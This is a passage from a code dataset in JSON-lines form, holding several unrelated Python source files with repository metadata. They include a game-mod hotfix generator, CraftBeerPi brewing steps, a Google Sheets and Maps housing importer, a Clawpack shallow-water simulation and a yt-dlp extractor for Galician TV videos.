The revive one is\n# happy to use the \"real\" stat as-is, so we use that (ie: my current number of AR kills plus one).\nfor challenge, target in [\n # Trade with a player\n ('/Game/GameData/Challenges/Economy/Challenge_Economy_COOPTrade.Default__Challenge_Economy_COOPTrade_C', 1),\n # Revive a partner\n ('/Game/GameData/Challenges/System/BP_Challenge_Console_RevivePartner.Default__BP_Challenge_Console_RevivePartner_C', tracked_stat_target),\n ]:\n mod.reg_hotfix(Mod.PATCH, '',\n challenge,\n 'StatChallengeTests.StatChallengeTests[0]',\n f\"\"\"(\n StatId={tracked_stat},\n GoalInfo=(\n (\n GoalValue={target},\n NotificationThreshold={target}\n )\n )\n )\"\"\")\n\nmod.close()\n","repo_name":"BLCM/wlmods","sub_path":"Apocalyptech/deprecated_or_broken/gen_achievement_shenanigans.py","file_name":"gen_achievement_shenanigans.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"78"} +{"seq_id":"70412929531","text":"from gensim.models.doc2vec import Doc2Vec, TaggedDocument\r\n\r\n\r\nfile = [[\"I have a pet\"], [\"They have a pet\"], [\"she has no pet\"], [\"no pet\"], [\"many have pet\"], [\"Some have no pet\"], [\"they no pet\"], [\"no pet\"], [\"We have no pet\"]]\r\n\r\ntotal = [word.split() for sentence in file for word in sentence]\r\n\r\n#Tokenize the sentence so that I can feed it into Doc2Vec model for training\r\ntotalTagged = [TaggedDocument(sentence,[i]) for i, sentence in enumerate(total)]\r\n\r\n#Create the model, build the vocabulary and finally train it\r\nmodel = Doc2Vec(totalTagged, min_count = 1, workers=1, vector_size=3)\r\nmodel.build_vocab(totalTagged, update=True) \r\nmodel.train(totalTagged,total_examples=1, epochs=1000000)\r\n# Print all the words that are similar to these words\r\nprint(model.wv.most_similar(\"have\"))\r\nprint(model.wv.most_similar(\"Some\"))\r\n\r\n#Print all the sentences that are similar to the labels \r\nprint(model.docvecs.most_similar(0))\r\nprint(model.docvecs.most_similar(8))\r\n\r\n#print(model.wv)","repo_name":"kokwai4869/NLP","sub_path":"Doc2Vec/Doc2VecSimple.py","file_name":"Doc2VecSimple.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2277557866","text":"# -*- coding: utf-8 -*-\n################################################################################\nimport time\n\nfrom modules.core.props import Property, StepProperty\nfrom modules.core.step import StepBase\nfrom modules import cbpi\n\n################################################################################\n@cbpi.step\nclass AltMashInStep(StepBase):\n # Properties\n a_kettle_prop = StepProperty.Kettle(\"Kettle\", description=\"Kettle in which the mashing takes place\")\n b_target_prop = Property.Number(\"Temperature\", configurable=True, description=\"Target Temperature of Mash Step\")\n c_agitator_prop = Property.Select(\"Run agitator while heating?\", options=[\"Yes\",\"No\"])\n d_kill_heat_prop = Property.Select(\"Turn off heater when target reached?\", options=[\"Yes\",\"No\"])\n\n #-------------------------------------------------------------------------------\n def init(self):\n self.kettle = int(self.a_kettle_prop)\n self.target = float(self.b_target_prop)\n self.agitator_run = self.c_agitator_prop == \"Yes\"\n self.kill_heat = self.d_kill_heat_prop == \"Yes\"\n self.done = False\n\n self.agitator = zint(cbpi.cache.get(\"kettle\")[self.kettle].agitator)\n\n # set target 
temp\n self.set_target_temp(self.target, self.kettle)\n if self.agitator and self.agitator_run:\n self.actor_on(self.agitator)\n\n #-------------------------------------------------------------------------------\n def finish(self):\n self.set_target_temp(0, self.kettle)\n\n #-------------------------------------------------------------------------------\n def execute(self):\n # Check if Target Temp is reached\n if (self.get_kettle_temp(self.kettle) >= self.target) and (self.done is False):\n self.done = True\n if self.kill_heat:\n self.set_target_temp(0, self.kettle)\n if self.agitator:\n self.actor_off(self.agitator)\n self.notify(\"{} complete\".format(self.name), \"Press next button to continue\", type='warning', timeout=None)\n\n################################################################################\n@cbpi.step\nclass AltMashStep(StepBase):\n # Properties\n a_kettle_prop = StepProperty.Kettle(\"Kettle\", description=\"Kettle in which the mashing takes place\")\n b_target_prop = Property.Number(\"Temperature\", configurable=True, description=\"Target Temperature of Mash Step\")\n c_timer_prop = Property.Number(\"Timer in minutes\", configurable=True, description=\"Amount of time to maintain taget temperature in this step\")\n d_offset_prop = Property.Number(\"Target timer offset\", configurable=True, default_value=0, description=\"Start timer when temperature is this close to target. Useful for PID heaters that approach target slowly.\")\n e_agitator_start_prop = Property.Select(\"Turn agitator on at start?\", options=[\"Yes\",\"No\"])\n f_agitator_stop_prop = Property.Select(\"Turn agitator off at end?\", options=[\"Yes\",\"No\"])\n #-------------------------------------------------------------------------------\n def init(self):\n self.kettle = int(self.a_kettle_prop)\n self.target = float(self.b_target_prop)\n self.timer = float(self.c_timer_prop)\n self.offset = float(self.d_offset_prop)\n self.agitator_start = self.e_agitator_start_prop == \"Yes\"\n self.agitator_stop = self.f_agitator_stop_prop == \"Yes\"\n\n self.agitator = zint(cbpi.cache.get(\"kettle\")[self.kettle].agitator)\n\n # set target temp\n self.set_target_temp(self.target, self.kettle)\n if self.agitator and self.agitator_start:\n self.actor_on(self.agitator)\n\n #-------------------------------------------------------------------------------\n @cbpi.action(\"Start Timer Now\")\n def start(self):\n if self.is_timer_finished() is None:\n self.start_timer(self.timer * 60)\n\n #-------------------------------------------------------------------------------\n def reset(self):\n self.stop_timer()\n self.set_target_temp(self.target, self.kettle)\n\n #-------------------------------------------------------------------------------\n def finish(self):\n self.set_target_temp(0, self.kettle)\n if self.agitator and self.agitator_stop:\n self.actor_off(self.agitator)\n\n #-------------------------------------------------------------------------------\n def execute(self):\n # Check if Target Temp is reached\n if self.get_kettle_temp(self.kettle) >= self.target - self.offset:\n # Check if Timer is Running\n if self.is_timer_finished() is None:\n self.start_timer(self.timer * 60)\n\n # Check if timer finished and go to next step\n if self.is_timer_finished() is True:\n self.notify(\"{} complete\".format(self.name), \"Starting the next step\", type='success', timeout=None)\n self.next()\n\n################################################################################\n@cbpi.step\nclass AltBoilStep(StepBase):\n # 
Properties\n textDesc = \"Brief description of the addition\"\n timeDesc = \"Time in minutes before end of boil\"\n add_1_text = Property.Text(\"Addition 1 Name\", configurable=True, description = textDesc)\n add_1_time = Property.Number(\"Addition 1 Time\", configurable=True, description = timeDesc)\n add_2_text = Property.Text(\"Addition 2 Name\", configurable=True, description = textDesc)\n add_2_time = Property.Number(\"Addition 2 Time\", configurable=True, description = timeDesc)\n add_3_text = Property.Text(\"Addition 3 Name\", configurable=True, description = textDesc)\n add_3_time = Property.Number(\"Addition 3 Time\", configurable=True, description = timeDesc)\n add_4_text = Property.Text(\"Addition 4 Name\", configurable=True, description = textDesc)\n add_4_time = Property.Number(\"Addition 4 Time\", configurable=True, description = timeDesc)\n add_5_text = Property.Text(\"Addition 5 Name\", configurable=True, description = textDesc)\n add_5_time = Property.Number(\"Addition 5 Time\", configurable=True, description = timeDesc)\n add_6_text = Property.Text(\"Addition 6 Name\", configurable=True, description = textDesc)\n add_6_time = Property.Number(\"Addition 6 Time\", configurable=True, description = timeDesc)\n add_7_text = Property.Text(\"Addition 7 Name\", configurable=True, description = textDesc)\n add_7_time = Property.Number(\"Addition 7 Time\", configurable=True, description = timeDesc)\n add_8_text = Property.Text(\"Addition 8 Name\", configurable=True, description = textDesc)\n add_8_time = Property.Number(\"Addition 8 Time\", configurable=True, description = timeDesc)\n\n kettle_prop = StepProperty.Kettle(\"Kettle\", description=\"Kettle in which the boiling step takes place\")\n target_prop = Property.Number(\"Temperature\", configurable=True, description=\"Target temperature for boiling\")\n timer_prop = Property.Number(\"Timer in Minutes\", configurable=True, default_value=90, description=\"Timer is started when target temperature is reached\")\n\n warning_addition_prop = Property.Number(\"Addition Warning\", configurable=True, default_value=30, description=\"Time in seconds to warn before each addition\")\n warning_boil_prop = Property.Number(\"Boil Warning\", configurable=True, default_value=1, description=\"Degrees below target to warn of impending boil\")\n\n #-------------------------------------------------------------------------------\n def init(self):\n\n self.target = float(self.target_prop)\n self.kettle = int(self.kettle_prop)\n self.timer = float(self.timer_prop) * 60.0\n self.warn_add = float(self.warning_addition_prop)\n self.warn_boil = float(self.warning_boil_prop)\n\n self.done_boil_warn = False\n self.done_boil_alert = False\n\n # set the additions dictionary\n self.additions = dict()\n for i in range(1,9):\n additionTime = self.__getattribute__(\"add_{}_time\".format(i))\n additionText = self.__getattribute__(\"add_{}_text\".format(i))\n try:\n if additionText is None:\n additionText = \"Addition {}\".format(i)\n self.additions[i] = {\n 'text': additionText,\n 'time': float(additionTime) * 60.0,\n 'mins': int(additionTime),\n 'done': False,\n 'warn': False,\n }\n except:\n # empty or invalid addition\n pass\n # set target temp\n self.set_target_temp(self.target, self.kettle)\n\n #-------------------------------------------------------------------------------\n @cbpi.action(\"Start Timer Now\")\n def start(self):\n if self.is_timer_finished() is None:\n self.start_timer(self.timer)\n\n 
#-------------------------------------------------------------------------------\n def reset(self):\n self.stop_timer()\n self.set_target_temp(self.target, self.kettle)\n\n #-------------------------------------------------------------------------------\n def finish(self):\n self.set_target_temp(0, self.kettle)\n\n #-------------------------------------------------------------------------------\n def execute(self):\n # Check if Target Temp is reached\n if self.is_timer_finished() is None:\n self.check_boil_warnings()\n if self.get_kettle_temp(self.kettle) >= self.target:\n self.start_timer(self.timer)\n elif self.is_timer_finished() is True:\n self.notify(\"{} complete\".format(self.name), \"Starting the next step\", type='success', timeout=None)\n self.next()\n else:\n self.check_addition_timers()\n\n #-------------------------------------------------------------------------------\n def check_addition_timers(self):\n for i in self.additions:\n addition_time = self.timer_end - self.additions[i]['time']\n warning_time = addition_time - self.warn_add\n now = time.time()\n if not self.additions[i]['warn'] and now > warning_time:\n self.additions[i]['warn'] = True\n self.notify(\"Warning: {} min Additions\".format(self.additions[i]['mins']),\n \"Add {} in {} seconds\".format(self.additions[i]['text'],self.warn_add),\n type='info', timeout=(self.warn_add - 1)*1000)\n if not self.additions[i]['done'] and now > addition_time:\n self.additions[i]['done'] = True\n self.notify(\"Alert: {} min Additions\".format(self.additions[i]['mins']),\n \"Add {} now\".format(self.additions[i]['text']),\n type='warning', timeout=None)\n\n #-------------------------------------------------------------------------------\n def check_boil_warnings(self):\n if (not self.done_boil_warn) and (self.get_kettle_temp(self.kettle) >= self.target - self.warn_boil):\n self.notify(\"Warning: Boil Approaching\", \"Current Temp {:.1f}\".format(self.get_kettle_temp(self.kettle)),\n type=\"info\", timeout=self.warn_add*1000)\n self.done_boil_warn = True\n if (not self.done_boil_alert) and (self.get_kettle_temp(self.kettle) >= self.target):\n self.notify(\"Alert: Boil Imminent\", \"Current Temp {:.1f}\".format(self.get_kettle_temp(self.kettle)),\n type=\"warning\", timeout=None)\n self.done_boil_alert = True\n\n################################################################################\n# Utilities\n################################################################################\ndef zint(value):\n try: return int(float(value))\n except: return 0\n","repo_name":"JoshShearer/AutomatedBrew","sub_path":"modules/plugins/AltBaseSteps/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40605315325","text":"from irrad_control.analysis import plotting, constants\nfrom irrad_control.utils.utils import duration_str_from_secs\n\ndef main(data, config=None):\n\n figs = []\n server = config['name']\n\n beam_current = data[server]['Beam']['beam_current'] / constants.nano\n\n # Beam current over time\n fig, _ = plotting.plot_beam_current(timestamps=data[server]['Beam']['timestamp'],\n beam_current=beam_current)\n figs.append(fig)\n\n # Beam current histogram\n plot_data = {\n 'xdata': beam_current,\n 'xlabel': 'Beam current / nA',\n 'ylabel': '#',\n 'label': \"Beam current over {}\".format(duration_str_from_secs(seconds=data[server]['Beam']['timestamp'][-1]-data[server]['Beam']['timestamp'][0])),\n 
'title': \"Beam current distribution\",\n 'fmt': 'C0'\n }\n plot_data['label'] += \":\\n ({:.2f}{}{:.2f}) nA\".format(beam_current.mean(), u'\\u00b1', beam_current.std())\n\n fig, _ = plotting.plot_generic_fig(plot_data=plot_data, hist_data={'bins': 'stat'})\n figs.append(fig)\n\n # Relative position of beam-mean wrt the beam pipe center\n fig, _ = plotting.plot_relative_beam_position(horizontal_pos=data[server]['Beam']['horizontal_beam_position'],\n vertical_pos=data[server]['Beam']['vertical_beam_position'])\n figs.append(fig)\n\n return figs","repo_name":"cyclotron-bonn/irrad_control","sub_path":"irrad_control/analysis/beam.py","file_name":"beam.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9298113411","text":"import io\n\nimport discord\nfrom artworks import illustration\nfrom discord import File\nfrom pixiv_keywords import PixivIllustrationSize\n\nfrom command import Command\n\n\nclass DirectPixivImgCommand(Command):\n def __init__(self):\n super().__init__()\n self.name = 'pixiv'\n\n async def run(self, ctx, *args):\n info = illustration.get_artwork_info(args[0])\n\n page = (0 if args[1] > info.get_page_count() else args[1]) if len(args) > 1 else 0\n\n image = info.get_image(PixivIllustrationSize.REGULAR, page)\n file = io.BytesIO(image)\n filename = f'{args[0]}_p{page}.{info.get_image_format(PixivIllustrationSize.REGULAR)}'\n attachment = File(file, filename=filename)\n\n embed = discord.Embed()\n embed.add_field(name=\"標題\", value=info.get_title(), inline=False)\n embed.add_field(name=\"簡介\", value='\\u200B' if info.get_description()=='' else info.get_description(),\n inline=False)\n # embed.add_field(name=\"標籤\", value=info.get_tags(), inline=False)\n embed.add_field(name=\"作者\", value=info.get_author_name(), inline=False)\n embed.add_field(name=\"ID\", value=f'[{info.get_id()}](https://www.pixiv.net/artworks/{info.get_id()})',\n inline=True)\n embed.add_field(name=\"頁碼\", value=page, inline=False)\n embed.add_field(name=\"頁數\", value=info.get_page_count(), inline=True)\n embed.set_image(url=\"attachment://\" + filename)\n\n await ctx.send(file=attachment, embed=embed)\n","repo_name":"Huanying04/HitomiBot","sub_path":"commands/direct_pixiv_img.py","file_name":"direct_pixiv_img.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73107297851","text":"#! 
/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\n\nGiven an input string, reverse the string word by word.\n\nFor example,\nGiven s = \"the sky is blue\",\nreturn \"blue is sky the\".\n\n\"\"\"\n\nclass Solution:\n # @param s, a string\n # @return a string\n def reverseWords(self, s):\n splited = s.split(' ')\n\n if len(splited)==0:\n return None\n else:\n s = ' '.join(reversed(s.split()))\n return s\n\n\n\n\n\n","repo_name":"fzhurd/fzwork","sub_path":"PythonWork/codeexer/reverse_words.py","file_name":"reverse_words.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"6826355934","text":"from os import system\nimport argparse\nimport os.path\nimport requests\nimport json\nimport math\nimport time\nimport urllib.parse\nfrom googleapiclient.discovery import build\nfrom googlesearch import search\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\nfrom google.oauth2.credentials import Credentials\n\n# If modifying these scopes, delete the file token.json.\nSCOPES = [\"https://www.googleapis.com/auth/spreadsheets.readonly\"]\n\n# The ID and range of a sample spreadsheet.\nRANGE_TEMPLATE = \"{tab}!A2:J\"\n\nADDR_RESOLUTION_TEMPLATE = \"https://maps.googleapis.com/maps/api/place/findplacefromtext/json?fields=formatted_address%2Cname%2Cgeometry&input={raw_addr}&inputtype=textquery&key={maps_api_key}\"\n\n\ndef loadCreds():\n sheets_creds = None\n # The file token.json stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists(\"../credentials/token.json\"):\n sheets_creds = Credentials.from_authorized_user_file(\"../credentials/token.json\", SCOPES)\n # If there are no (valid) credentials available, let the user log in.\n if not sheets_creds or not sheets_creds.valid:\n if sheets_creds and sheets_creds.expired and sheets_creds.refresh_token:\n sheets_creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\"../credentials/credentials.json\", SCOPES)\n sheets_creds = flow.run_local_server(port=0)\n # Save the credentials for the next run\n with open(\"../credentials/token.json\", \"w\") as token:\n token.write(sheets_creds.to_json())\n\n maps_api_key = None\n if os.path.exists(\"../credentials/maps_key.json\"):\n key_file = open(\"../credentials/maps_key.json\")\n maps_api_key = json.load(key_file)[\"key\"]\n else:\n print(\"Missing maps_key.json with Google Maps API key\")\n quit()\n\n return sheets_creds, maps_api_key\n\n\ndef loadSheets(sheets_creds, sheet_id):\n service = build(\"sheets\", \"v4\", credentials=sheets_creds)\n\n # Call the Sheets API\n sheet = service.spreadsheets()\n\n # Get Sheet metadata\n metadata = sheet.get(spreadsheetId=sheet_id).execute()\n tabs = []\n for sheet in metadata.get(\"sheets\", []):\n tabs.append(sheet[\"properties\"][\"title\"])\n\n # Get Sheet content\n result = []\n for tab in tabs:\n print(\"Loading {tab}\".format(tab=tab))\n sheet = service.spreadsheets()\n contents = (\n sheet.values()\n .get(\n spreadsheetId=sheet_id,\n range=RANGE_TEMPLATE.format(tab=tab),\n )\n .execute()\n )\n rows = contents.get(\"values\", [])\n result = result + rows\n\n print(\n \"Finished loading {num_rows} rows from sheet {sheet_id}\".format(\n num_rows=len(result), sheet_id=sheet_id\n )\n )\n return result\n\n\ndef toHouseEntries(values, maps_api_key):\n if not values:\n print(\"No data 
found.\")\n else:\n result = []\n for row in values:\n raw_addr = \"\"\n if len(row) != 9 and len(row) != 10:\n continue\n elif len(row) == 9:\n raw_addr = \" \".join([row[1], row[2], row[3], row[4]])\n rowDict = {\n \"mls_id\": row[0],\n \"bed_baths\": row[5],\n \"sqft\": row[6],\n \"year_built\": row[7],\n \"price\": row[8],\n \"type\": \"SFR\",\n }\n elif len(row) == 10:\n raw_addr = \" \".join([row[2], row[3], row[4], row[5]])\n rowDict = {\n \"mls_id\": row[0],\n \"bed_baths\": row[6],\n \"sqft\": row[7],\n \"year_built\": row[8],\n \"price\": row[9],\n \"type\": row[1],\n }\n\n resolvedGeoData = getGeoData(raw_addr, maps_api_key, attempt=1)\n link = getFirstSearchResult(rowDict[\"mls_id\"], attempt=1)\n if len(resolvedGeoData) == 0 or link is None:\n continue\n\n rowDict[\"addr\"] = resolvedGeoData[\"formatted_addr\"]\n rowDict[\"coordinates\"] = resolvedGeoData[\"coordinates\"]\n rowDict[\"link\"] = link\n\n result.append(rowDict)\n\n return result\n\n\ndef getGeoData(raw_addr, maps_api_key, attempt):\n url = ADDR_RESOLUTION_TEMPLATE.format(\n raw_addr=urllib.parse.quote(raw_addr), maps_api_key=maps_api_key\n )\n resp = requests.get(url=url)\n\n if resp.status_code != 200 or resp.json()[\"status\"] == \"OVER_QUERY_LIMIT\":\n backoff_time = math.pow(2, attempt)\n if resp.status_code == 200:\n print(resp.json())\n print(\n \"Retrying fetching {raw_addr} in {wait} seconds\".format(\n raw_addr=raw_addr, wait=backoff_time\n )\n )\n time.sleep(backoff_time)\n return getGeoData(raw_addr, maps_api_key, attempt + 1)\n elif len(resp.json()[\"candidates\"]) == 0:\n print(\n \"Found no matches for {raw_addr}: {resp}\".format(\n raw_addr=raw_addr, resp=resp.json()\n )\n )\n return {}\n else:\n info = resp.json()[\"candidates\"][0]\n print(\n \"Fetched {raw_addr} in attempt {attempt_num}\".format(\n raw_addr=raw_addr, attempt_num=attempt\n )\n )\n return {\n \"formatted_addr\": info[\"formatted_address\"],\n \"coordinates\": info[\"geometry\"][\"location\"],\n }\n\n\ndef getFirstSearchResult(mls_id, attempt):\n res = next(\n search(\"MLS {mls_id}\".format(mls_id=mls_id), num=1, stop=1, pause=2), None\n )\n if res is None:\n if attempt == 3:\n print(\"Found no links for {mls_id}\".format(mls_id=mls_id))\n return None\n backoff_time = math.pow(2, attempt)\n print(\n \"Retrying fetching link for {mls_id} in {wait} seconds\".format(\n mls_id=mls_id, wait=backoff_time\n )\n )\n return getFirstSearchResult(mls_id, attempt + 1)\n print(\n \"Fetched link for {mls_id} in attempt {attempt_num}\".format(\n mls_id=mls_id, attempt_num=attempt\n )\n )\n return res\n\n\ndef main():\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-sid\", \"--sheet_id\", help=\"Sheet ID\")\n parser.add_argument(\n \"-disk\",\n \"--write_to_disk\",\n default=False,\n required=False,\n help=\"Whether or not to write imported results to disk\",\n type=bool,\n )\n args = parser.parse_args()\n\n sheets_creds, maps_api_key = loadCreds()\n raw_sheet_rows = loadSheets(sheets_creds, args.sheet_id)\n output_rows = toHouseEntries(raw_sheet_rows, maps_api_key)\n\n if args.write_to_disk is True:\n with open(\"houses.json\", \"w\") as output_file:\n json.dump(output_rows, output_file, indent=4)\n\n print(\"Finished importing housing data\")\n exit()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"guilam34/house_mapper","sub_path":"importer/importer.py","file_name":"importer.py","file_ext":"py","file_size_in_byte":7140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} 
+{"seq_id":"37420888012","text":"#!/usr/bin/env python\n# encoding: utf-8\nr\"\"\"\n2D shallow water: radial dam break\n==================================\n\nSolve the 2D shallow water equations:\n\n.. :math:\n h_t + (hu)_x + (hv)_y & = 0 \\\\\n (hu)_t + (hu^2 + \\frac{1}{2}gh^2)_x + (huv)_y & = 0 \\\\\n (hv)_t + (huv)_x + (hv^2 + \\frac{1}{2}gh^2)_y & = 0.\n\nThe initial condition is a circular area with high depth surrounded by lower-depth water.\nThe top and right boundary conditions reflect, while the bottom and left boundaries\nare outflow.\n\"\"\"\n\nimport numpy as np\nfrom clawpack import riemann\nfrom clawpack.riemann.shallow_roe_with_efix_2D_constants import depth, x_momentum, y_momentum, num_eqn\nimport overridden_fun\n\nclass Parameters(object):\n\n def __init__(self):\n r\"\"\"\n Initialization of default parameters.\n \"\"\"\n self.xlower = -2.5\n self.xupper = 2.5\n self.ylower = -2.5\n self.yupper = 2.5\n self.tfinal = 2.5\n self.num_output_times = 10\n self.max_steps = 100000\n self.tv_check = False\n self.check_lmm_cond = True\n self.use_petsc = False\n\n def set_initial_cond(self,state,h_in=2.,h_out=1.,dam_radius=1.):\n r\"\"\"\n Set initial condition.\n \"\"\"\n x0=0.\n y0=0.\n X, Y = state.p_centers\n r = np.sqrt((X-x0)**2 + (Y-y0)**2)\n r0 = dam_radius\n h = 1.+ np.exp(-10.*(r-r0)**2)\n state.q[depth ,:,:] = h#h_in*(r<=dam_radius) + h_out*(r>dam_radius)\n state.q[x_momentum,:,:] = -X*np.exp(-10.*(r-r0)**2)##0.\n state.q[y_momentum,:,:] = -Y*np.exp(-10.*(r-r0)**2)##0.\n\n\ndef setup(nx=[150,150],kernel_language='Fortran',solver_type='sharpclaw',time_integrator='SSP104',lmm_steps=None,\\\n cfl=None,lim_type=2,limiter=4,dt_variable=True,dt_initial=None,outdir='./_output',\\\n paramtrs=Parameters()):\n\n if paramtrs.use_petsc:\n import clawpack.petclaw as pyclaw\n claw_package = 'clawpack.petclaw'\n else:\n from clawpack import pyclaw\n claw_package = 'clawpack.pyclaw'\n\n if kernel_language == 'Fortran':\n riemann_solver = riemann.shallow_roe_with_efix_2D\n else: \n raise Exception('Use kernel_language=''Fortran''.')\n\n if solver_type == 'classic':\n solver = overridden_fun.set_solver(pyclaw.ClawSolver2D,riemann_solver,claw_package=claw_package)\n solver.limiters = pyclaw.limiters.tvd.MC\n solver.dimensional_split=1\n elif solver_type == 'sharpclaw':\n solver = overridden_fun.set_solver(pyclaw.SharpClawSolver2D,riemann_solver,claw_package=claw_package)\n solver.time_integrator = time_integrator\n solver.lmm_steps = lmm_steps\n solver.check_lmm_cond = paramtrs.check_lmm_cond\n solver.lim_type = lim_type\n if cfl is not None:\n solver.cfl_desired = cfl[0]\n solver.cfl_max = cfl[1]\n if lim_type == 1:\n solver.limiters = limiter\n if dt_variable == False:\n solver.dt_variable = False\n solver.dt_initial = dt_initial\n\n solver.kernel_language = kernel_language\n solver.tv_check = paramtrs.tv_check\n solver.use_petsc = paramtrs.use_petsc\n\n solver.bc_lower[0] = pyclaw.BC.extrap\n solver.bc_upper[0] = pyclaw.BC.wall\n solver.bc_lower[1] = pyclaw.BC.extrap\n solver.bc_upper[1] = pyclaw.BC.wall\n\n # Domain:\n x = pyclaw.Dimension(paramtrs.xlower,paramtrs.xupper,nx[0],name= 'x')\n y = pyclaw.Dimension(paramtrs.ylower,paramtrs.yupper,nx[1],name= 'y')\n domain = pyclaw.Domain([x,y])\n\n state = pyclaw.State(domain,num_eqn)\n\n # Gravitational constant\n state.problem_data['grav'] = 1.0\n\n paramtrs.set_initial_cond(state)\n\n claw = pyclaw.Controller()\n claw.solution = pyclaw.Solution(state,domain)\n claw.solver = solver\n claw.outdir = outdir\n claw.solver.max_steps = 
paramtrs.max_steps\n claw.tfinal = paramtrs.tfinal\n claw.num_output_times = paramtrs.num_output_times\n claw.setplot = setplot\n claw.keep_copy = True\n\n return claw\n\n#--------------------------\ndef setplot(plotdata):\n#--------------------------\n \"\"\" \n Specify what is to be plotted at each frame.\n Input: plotdata, an instance of visclaw.data.ClawPlotData.\n Output: a modified version of plotdata.\n \"\"\" \n from clawpack.visclaw import colormaps\n\n plotdata.clearfigures() # clear any old figures,axes,items data\n\n # Figure for depth\n plotfigure = plotdata.new_plotfigure(name='Water height', figno=0)\n\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes()\n plotaxes.xlimits = [-2.5, 2.5]\n plotaxes.ylimits = [-2.5, 2.5]\n plotaxes.title = 'Water height'\n plotaxes.scaled = True\n\n # Set up for item on these axes:\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = 0\n plotitem.pcolor_cmap = colormaps.red_yellow_blue\n plotitem.pcolor_cmin = 0.5\n plotitem.pcolor_cmax = 1.5\n plotitem.add_colorbar = True\n \n # Scatter plot of depth\n plotfigure = plotdata.new_plotfigure(name='Scatter plot of h', figno=1)\n\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes()\n plotaxes.xlimits = [0., 2.5]\n plotaxes.ylimits = [0., 2.1]\n plotaxes.title = 'Scatter plot of h'\n\n # Set up for item on these axes:\n plotitem = plotaxes.new_plotitem(plot_type='1d_from_2d_data')\n plotitem.plot_var = depth\n def q_vs_radius(current_data):\n from numpy import sqrt\n x = current_data.x\n y = current_data.y\n r = sqrt(x**2 + y**2)\n q = current_data.q[depth,:,:]\n return r,q\n plotitem.map_2d_to_1d = q_vs_radius\n plotitem.plotstyle = 'o'\n\n\n # Figure for x-momentum\n plotfigure = plotdata.new_plotfigure(name='Momentum in x direction', figno=2)\n\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes()\n plotaxes.xlimits = [-2.5, 2.5]\n plotaxes.ylimits = [-2.5, 2.5]\n plotaxes.title = 'Momentum in x direction'\n plotaxes.scaled = True\n\n # Set up for item on these axes:\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = x_momentum\n plotitem.pcolor_cmap = colormaps.yellow_red_blue\n plotitem.add_colorbar = True\n plotitem.show = False # show on plot?\n \n\n # Figure for y-momentum\n plotfigure = plotdata.new_plotfigure(name='Momentum in y direction', figno=3)\n\n # Set up for axes in this figure:\n plotaxes = plotfigure.new_plotaxes()\n plotaxes.xlimits = [-2.5, 2.5]\n plotaxes.ylimits = [-2.5, 2.5]\n plotaxes.title = 'Momentum in y direction'\n plotaxes.scaled = True\n\n # Set up for item on these axes:\n plotitem = plotaxes.new_plotitem(plot_type='2d_pcolor')\n plotitem.plot_var = y_momentum\n plotitem.pcolor_cmap = colormaps.yellow_red_blue\n plotitem.add_colorbar = True\n plotitem.show = False # show on plot?\n \n return plotdata\n\n\nif __name__==\"__main__\":\n from clawpack.pyclaw.util import run_app_from_main\n output = run_app_from_main(setup,setplot)\n","repo_name":"numerical-mathematics/ssp-lmm-vss_RR","sub_path":"radial_shallow_water_2d.py","file_name":"radial_shallow_water_2d.py","file_ext":"py","file_size_in_byte":7027,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"37598982092","text":"from .common import InfoExtractor\nfrom ..utils import remove_end\n\n\nclass CrtvgIE(InfoExtractor):\n _VALID_URL = r'https?://(?:www\\.)?crtvg\\.es/tvg/a-carta/[^/#?]+-(?P\\d+)'\n _TESTS = [{\n 'url': 
'https://www.crtvg.es/tvg/a-carta/os-caimans-do-tea-5839623',\n 'md5': 'c0958d9ff90e4503a75544358758921d',\n 'info_dict': {\n 'id': '5839623',\n 'title': 'Os caimáns do Tea',\n 'ext': 'mp4',\n 'description': 'md5:f71cfba21ae564f0a6f415b31de1f842',\n 'thumbnail': r're:^https?://.*\\.(?:jpg|png)',\n },\n 'params': {'skip_download': 'm3u8'}\n }]\n\n def _real_extract(self, url):\n video_id = self._match_id(url)\n webpage = self._download_webpage(url, video_id)\n video_url = self._search_regex(r'var\\s+url\\s*=\\s*[\"\\']([^\"\\']+)', webpage, 'video url')\n formats = self._extract_m3u8_formats(video_url + '/playlist.m3u8', video_id, fatal=False)\n formats.extend(self._extract_mpd_formats(video_url + '/manifest.mpd', video_id, fatal=False))\n\n return {\n 'id': video_id,\n 'formats': formats,\n 'title': remove_end(self._html_search_meta(\n ['og:title', 'twitter:title'], webpage, 'title', default=None), ' | CRTVG'),\n 'description': self._html_search_meta('description', webpage, 'description', default=None),\n 'thumbnail': self._html_search_meta(['og:image', 'twitter:image'], webpage, 'thumbnail', default=None),\n 